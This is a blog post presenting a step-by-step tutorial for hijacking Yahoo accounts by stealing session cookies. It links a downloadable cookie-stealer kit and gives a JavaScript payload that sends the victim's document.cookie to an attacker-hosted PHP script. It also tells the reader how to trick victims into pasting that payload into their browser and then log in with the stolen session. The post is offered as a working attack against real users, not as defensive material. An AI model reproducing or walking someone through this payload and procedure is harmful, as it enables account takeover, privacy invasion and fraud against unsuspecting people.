Hack Yahoo Using COOKIES STEALING and SESSION HIJACKING

on
 
 
In this article am going to show you people how to hack yahoo accounts.You might have heard about cookies.
   When we sign into an account,it generates a unique string.One copy of that is placed in the server and the other one in your browser as a cookie.Both the copies are being compared and matched everytime we do something in our account.This allows you to browse many pages at a time without giving any authentication every time.This unique string is destroyed whenever we log out of our account.

 just visit yahoo.com and type

Javascript:alert(document.cookie);

in you address bar
you ll get a pop up showing the cookies.and then do the same thing after logging into your yahoo.You can see some more elements are being added.That means that a session is stored in your browser.

Now the attacker can steal these cookies by convincing the victim to run a piece of code in the browser.Attacker can use the stolen session to access the victims account without entering any id or password.

Am going to explain the step by step procedure to do this.

Step1: Download the following files and extract them.
http://www.ziddu.com/download/16215811/yahoocookiestealerbyindiantechnogeek.rar.html


Step2: You ll have four files in it.upload the 4 files into the file manager of your free webhosting account.You can create a webhosting account from these sites
http://www.freehostia.com/
http://www.my3gb.com/
etc.there are many free webhosting sites.Google them.
Here yahoo.php is the cookie stealing script and hacked.php executes the stolen cookies in the browser.
Now create a new directory named cookies in your account. The Stolen cookies get stored in the directory cookies.


Step3: Now you got to convince the victim to paste this code in his/her browser.
code: "javascript:document.location='http://yourdomain.com/yahoo.php?ex '.concat(escape(document.cookie)); 

 The victim would again get redirected to yahoo.com


Step4: Now open hacked.php in your webhosting account
your url would be http://yourdomain.com/hacked.php

default password is indiantechnogeek

Now you must have got the user name of the slaves account in hacked.php.Once you click on it you get logged into his account.This will be permanently stored.you need not type the id and password again.

       Any queries regarding this please leave a comment. :)

credit: indian techno geek

Comments

Post a Comment